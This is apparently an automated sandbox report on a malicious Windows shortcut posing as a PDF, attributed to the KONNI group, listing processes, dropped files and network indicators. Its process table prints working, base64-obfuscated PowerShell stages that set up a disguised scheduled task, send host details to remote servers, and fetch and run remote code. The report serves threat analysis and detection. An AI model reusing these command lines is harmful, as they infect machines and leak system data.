| File name: | 0e75a7d2077c13eb5c8b1329ea3b254d56b1b9210bacf5998ead7c17e62d1247 |
| Full analysis: | https://app.any.run/tasks/ce2a5153-21b2-46ae-8acd-96acca1e12c2 |
| Verdict: | Malicious activity |
| Analysis date: | June 18, 2025, 04:50:04 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Unicoded, EnableTargetMetadata, Archive, ctime=Tue Mar 19 04:46:58 2019, atime=Sat May 10 02:04:15 2025, mtime=Tue Mar 19 04:46:58 2019, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\windowspowershell\v1.0\PoWErSHeLl.exe" |
| MD5: | C0B47DC97CF9552B564CB227B6DE12C3 |
| SHA1: | 3480DD059ADB53A6BE9D063D16F6F22692C009D1 |
| SHA256: | 0E75A7D2077C13EB5C8B1329EA3B254D56B1B9210BACF5998EAD7C17E62D1247 |
| SSDEEP: | 6144:mCd55VBbMjHBhmuqXjlCNqPfN7yWUxHeo6Q:mMXbMjhwuqXjlCNaIxHl |
MALICIOUS
Bypass execution policy to execute commands
- powershell.exe (PID: 1068)
- powershell.exe (PID: 6220)
- powershell.exe (PID: 4764)
Uses Task Scheduler to run other applications
- cmd.exe (PID: 5348)
KONNI has been detected (SURICATA)
- powershell.exe (PID: 1068)
- powershell.exe (PID: 6220)
- powershell.exe (PID: 4764)
Script downloads file (POWERSHELL)
- powershell.exe (PID: 1068)
Changes powershell execution policy (Bypass)
- wscript.exe (PID: 3960)
- wscript.exe (PID: 5244)
Run PowerShell with an invisible window
- powershell.exe (PID: 6220)
- powershell.exe (PID: 4764)
SUSPICIOUS
Starts CMD.EXE for commands execution
- powershell.exe (PID: 1068)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 1068)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 1068)
The process executes via Task Scheduler
- wscript.exe (PID: 3960)
- wscript.exe (PID: 5244)
BASE64 encoded PowerShell command has been detected
- wscript.exe (PID: 3960)
- wscript.exe (PID: 5244)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 3960)
- wscript.exe (PID: 5244)
Runs shell command (SCRIPT)
- wscript.exe (PID: 3960)
- wscript.exe (PID: 5244)
Base64-obfuscated command line is found
- wscript.exe (PID: 3960)
- wscript.exe (PID: 5244)
INFO
Converts byte array into ASCII string (POWERSHELL)
- powershell.exe (PID: 1068)
Checks proxy server information
- powershell.exe (PID: 1068)
- powershell.exe (PID: 6220)
- slui.exe (PID: 6012)
- powershell.exe (PID: 4764)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 1068)
- powershell.exe (PID: 6220)
- powershell.exe (PID: 4764)
Remote server returned an error (POWERSHELL)
- powershell.exe (PID: 1068)
- powershell.exe (PID: 6220)
- powershell.exe (PID: 4764)
Disables trace logs
- powershell.exe (PID: 1068)
- powershell.exe (PID: 6220)
- powershell.exe (PID: 4764)
Reads the software policy settings
- slui.exe (PID: 6012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, TargetMetadata |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2019:03:19 04:46:58+00:00 |
| AccessDate: | 2025:05:10 02:04:15+00:00 |
| ModifyDate: | 2019:03:19 04:46:58+00:00 |
| TargetFileSize: | - |
| IconIndex: | (none) |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| DriveType: | Fixed Disk |
| DriveSerialNumber: | F423-8020 |
| VolumeLabel: | - |
| LocalBasePath: | C:\Windows\System32\windowspowershell\v1.0\PoWErSHeLl.exe |
| Description: | Type: PDF File Size: 202KB Date modified: 05/08/2025 10:50 |
| RelativePath: | ..\..\..\Windows\System32\notepad.exe |
Total processes
142
Monitored processes
12
Malicious processes
5
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1068 | "C:\Windows\System32\windowspowershell\v1.0\PoWErSHeLl.exe" -ep bypass -c "$orge=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JGRhdGEgPSAiZG1GeUlHNWhjM0psWkdScGJtVTlJRzVsZHlCQlkzUnBkbVZZVDJKcVpXTjBLQ0pYVTJOeWFYQjBMbE5vWld4c0lpazdEUXB1WVhOeVpXUmthVzVsTG5KMWJpZ2ljRzkzWlhKemFHVnNiQ0F0WlhBZ1lubHdZWE56SUMxM0lHaHBaR1JsYmlBdFpTQmNJbE5SUWtaQlJtZEJTMEZCYjBGRk5FRmFVVUl6UVVNd1FWUjNRbWxCUjI5QldsRkNha0ZJVVVGSlFVSlBRVWRWUVdSQlFYVkJSbU5CV2xGQ2FVRkZUVUZpUVVKd1FVZFZRV0puUWpCQlEydEJUR2RDUlVGSE9FRmtkMEoxUVVkM1FXSjNRbWhCUjFGQlZYZENNRUZJU1VGaFVVSjFRVWRqUVV0QlFXNUJSMmRCWkVGQ01FRklRVUZQWjBGMlFVTTRRV1JCUW5aQlIxVkJZM2RCZFVGSE5FRmhVVUpyUVVjMFFWbFJRakpCUjFWQlkyZEJkVUZIVFVGaVFVSjJRVWhWUVZwQlFYWkJSMWxCWTJkQ2JFRkhWVUZOUVVFeFFVUkZRVTFCUVhaQlIxRkJZbWRCZFVGSVFVRmhRVUozUVVRNFFXSm5RbWhCUnpCQldsRkJPVUZEWTBGTGQwRnJRVWRWUVdKblFqSkJSRzlCVVhkQ1VFRkZNRUZWUVVKV1FVWlJRVkpSUWxOQlJUUkJVVkZDVGtGRlZVRkxkMEZ1UVVOWlFXTkJRbmxCUjFWQldtZENjRUZJWjBGUVVVSnVRVWRqUVVwblFqQkJTRUZCVUZGQmJrRkRjMEZYZDBKR1FVYzBRV1JuUW5CQlNFbEJZbmRDZFVGSE1FRmFVVUoxUVVoUlFWaFJRVFpCUkc5QlZIZENWRUZHV1VGYVVVSjVRVWhOUVdGUlFuWkJSelJCUzFGQmNFRkVjMEZjSWlJc0lEQXBPdz09IjsNCiRmbmFtZSA9ICRlbnY6QVBQREFUQSArICJcTWljcm9zb2Z0XFdpbmRvd3NcVGVtcGxhdGVzXGNocm9tZXVwZGF0ZS5qcyI7DQpbSU8uRmlsZV06OldyaXRlQWxsQnl0ZXMoJGZuYW1lLCBbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGRhdGEpKTsNCg0KJG1hZ2kgPSAiY21kIC9jIHNjaHRhc2tzIC9jcmVhdGUgL3NjIG1pbnV0ZSAvbW8gMSAvdG4gJ0dvb2dsZSBDaHJvbWUgVXBkYXRlJyAvdHIgJ3dzY3JpcHQuZXhlICIgKyAkZm5hbWUgKyAiJyAvZiI7DQpJRVggJG1hZ2k7DQoNCiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50Ow0KJHVybCA9ICJodHRwOi8va25lZXMubmlkbmF2ZXIuY2xvdWQvZnJlZTA1MTAvdmlldy5waHA/bmFtZT0iKyRlbnY6Q09NUFVURVJOQU1FKyImdHA9IitbRW52aXJvbm1lbnRdOjpPU1ZlcnNpb247DQokZm5hbWUgPSAkZW52OlVTRVJQUk9GSUxFICsgJ1xBcHBEYXRhXExvY2FsXFRlbXBcVGVtcGxhdGUucGRmJzsNCiRjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwsICRmbmFtZSk7DQpTdGFydC1Qcm9jZXNzICgoUmVzb2x2ZS1QYXRoICRmbmFtZSkuUGF0aCk7'));IEX($orge);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1948 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2200 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3960 | "wscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\chromeupdate.js | C:\Windows\System32\wscript.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 3976 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4684 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4764 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -e "SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdABvAGUAcwAuAG4AaQBkAG4AYQB2AGUAcgAuAGMAbABvAHUAZAAvAGYAcgBlAGUAMAA1ADEAMAAvAGQAbgAuAHAAaABwAD8AbgBhAG0AZQA9ACcAKwAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAKwAnACYAcAByAGUAZgBpAHgAPQBnAGcAJgB0AHAAPQAnACsAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4AKQApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5244 | "wscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\chromeupdate.js | C:\Windows\System32\wscript.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 5348 | "C:\WINDOWS\system32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Google Chrome Update" /tr "wscript.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\chromeupdate.js" /f | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6012 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
20 017
Read events
20 016
Write events
1
Delete events
0
Modification events
| (PID) Process: | (3960) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe |
| Operation: | write | Name: | JScriptSetScriptStateStarted |
Value: 7E26180000000000 | |||
Executable files
0
Suspicious files
3
Text files
7
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1068 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S770E6F5X4YSC5NFXVHM.temp | binary | |
MD5:AAF4C3F06AD9DAC0F31F7CADE764D7C3 | SHA256:ECEBF1BB7CD8810FAFEDF7E864CECB9700FF3A46028FEEE2FE8A41A450F8DFD1 | |||
| 1068 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3ixp0boy.zgq.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1068 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\chromeupdate.js | text | |
MD5:613F39F09ADF4521C50877800E7024A6 | SHA256:B696F6998EEF0499BAA0836357062BB8AEC76D0F59F519CA6383F3F48BB3DECC | |||
| 1068 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\512ce8f617a50017.customDestinations-ms | binary | |
MD5:AAF4C3F06AD9DAC0F31F7CADE764D7C3 | SHA256:ECEBF1BB7CD8810FAFEDF7E864CECB9700FF3A46028FEEE2FE8A41A450F8DFD1 | |||
| 4764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0b0brq5w.vxb.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uqfjd1b4.xcs.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_obk32fy5.1ts.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vgiqrky4.ufu.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1068 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:544BA93A04EC706006704A03E2FA0F94 | SHA256:4B1ACFAA099D19FC7628DBE23A8519FC27C39430ADCD84CD1FE9BF35FDFA4143 | |||
| 1068 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oe1wyowi.oec.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
22
DNS requests
9
Threats
3
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3732 | RUXIMICS.exe | GET | 200 | 23.216.77.25:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 23.216.77.25:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1068 | powershell.exe | GET | 404 | 156.67.75.194:80 | http://knees.nidnaver.cloud/free0510/view.php?name=DESKTOP-JGLLJLD&tp=Microsoft%20Windows%20NT%2010.0.19045.0 | unknown | — | — | malicious |
5944 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6220 | powershell.exe | GET | 404 | 156.67.75.194:80 | http://toes.nidnaver.cloud/free0510/dn.php?name=DESKTOP-JGLLJLD&prefix=gg&tp=Microsoft%20Windows%20NT%2010.0.19045.0 | unknown | — | — | malicious |
— | — | POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
4764 | powershell.exe | GET | 404 | 156.67.75.194:80 | http://toes.nidnaver.cloud/free0510/dn.php?name=DESKTOP-JGLLJLD&prefix=gg&tp=Microsoft%20Windows%20NT%2010.0.19045.0 | unknown | — | — | malicious |
— | — | POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
3732 | RUXIMICS.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.25:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3732 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3732 | RUXIMICS.exe | 23.216.77.25:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
1268 | svchost.exe | 23.216.77.25:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5944 | MoUsoCoreWorker.exe | 23.216.77.25:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
3732 | RUXIMICS.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
1268 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
knees.nidnaver.cloud |
| malicious |
activation-v2.sls.microsoft.com |
| whitelisted |
toes.nidnaver.cloud |
| malicious |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1068 | powershell.exe | A Network Trojan was detected | ET MALWARE Konni APT MalDoc Activity (GET) |
6220 | powershell.exe | A Network Trojan was detected | ET MALWARE Konni APT MalDoc Activity (GET) |
4764 | powershell.exe | A Network Trojan was detected | ET MALWARE Konni APT MalDoc Activity (GET) |